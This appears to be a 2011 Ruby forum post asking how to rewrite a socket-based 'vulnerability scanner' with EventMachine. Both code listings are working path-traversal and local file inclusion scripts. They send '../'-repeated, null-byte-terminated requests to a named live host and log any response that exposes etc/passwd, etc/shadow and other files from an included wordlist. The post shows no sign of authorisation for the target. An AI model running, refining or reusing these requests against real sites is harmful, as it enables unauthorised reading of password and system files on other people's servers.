from 'socket' to 'eventmachine' http client.

Discussion in 'Ruby' started by Bigmac Turdsplash, Jan 24, 2011.

  1. im working on a vulnerability scanner, basically a http client... i have
    a working script that only uses 'socket' but if i was using eventmachine
    i would get better performance...

    [working-script]
    require 'socket'
    my_file = File.new("log.txt", 'w')
    html = File.new("log.html","w")
    IO.foreach("list.lfi") do |block|
    host = 'www.i8igmac.com' # The web server
    port = 80 # Default HTTP port
    dir = "../"
    mply=0
    while mply < 10
    # This is the HTTP request we send to fetch a file
    request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
    HTTP/1.1\r\n"
    socket = TCPSocket.open(host,port) # Connect to server
    socket.print(request+"Host: "+host+"\r\n\r\n") # Send
    request
    response = socket.read # Read complete response
    # Split response at first blank line into headers and body
    headers,body = response.split("\r\n\r\n", 2)
    print request
    #print body # And display it
    check=body.scan("error")

    mply=mply+1

    if check.to_s == "error"
    print 'no inclusion'
    else
    print 'Please notify site owner of exploit\n'+request
    my_file.puts request
    html.puts request
    html.puts body.tr("www.", "www")

    end
    end
    end
    [working-script-end]


    [list.lfi-----]
    etc/passwd
    etc/shadow
    etc/cgi-bin
    etc/group
    etc/security/group
    [end.list-----]

    this script reads each line from the list then sends out a GET request,
    if a config file is found viewable to the public then this will be
    logged...

    this script does not handle any kind of protocal, its more of a crude
    ruff draft... if i could get eventmachine to handle the protocall
    performance would increase and script wouldnt crash...

    here is my attempt to use eventmachine...

    [em-code]
    require 'rubygems'
    require 'eventmachine'
    my_file = File.new("log.txt", 'w')
    html = File.new("out.htm","w")
    IO.foreach("list.lfi") do |block|
    lfihost = 'www.i8igmac.com' # The web server
    port = 80 # Default HTTP port
    dir = "../"
    mply=0
    while mply < 10
    request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
    HTTP/1.1\r\n"


    module DumbHttpClient
    def post_init
    print request
    send_data request
    @data = ""
    @parsed = false
    end

    def receive_data data
    @data << data
    headers,body = data.split("\r\n\r\n", 2)
    print data
    EventMachine::stop_event_loop
    end

    end
    EventMachine::run {
    EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
    }
    puts "The event loop has ended"



    print request
    #print body # And display it
    check=body.scan("error")
    mply=mply+1
    if check.to_s == "error"
    print 'no inclusion'
    else
    print 'FOUND ONE\n'+request
    my_file.puts request
    html.puts request
    html.puts body.tr("www.", "www")
    end
    end
    end
    [em-end]

    any one with eventmachine expearnce could give me some help... i dont
    understand why strings wont exist inside the function.. clueless at this
    point

    --
    Posted via http://www.ruby-forum.com/.
     
    Bigmac Turdsplash, Jan 24, 2011
    #1
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Laszlo Nagy
    Replies:
    1
    Views:
    4,927
    Mark Wooding
    Jan 27, 2009
  2. Jean-Paul Calderone
    Replies:
    0
    Views:
    993
    Jean-Paul Calderone
    Jan 27, 2009
  3. Diego Bernardes

    How to close socket with eventmachine?

    Diego Bernardes, Jun 24, 2009, in forum: Ruby
    Replies:
    1
    Views:
    155
    Roger Pack
    Jun 24, 2009
  4. Angel Marques

    basic chat client using eventmachine

    Angel Marques, Aug 10, 2010, in forum: Ruby
    Replies:
    1
    Views:
    191
    Roger Pack
    Aug 10, 2010
  5. Shea Barton
    Replies:
    2
    Views:
    294
    Shea Barton
    Feb 10, 2011
Loading...

Share This Page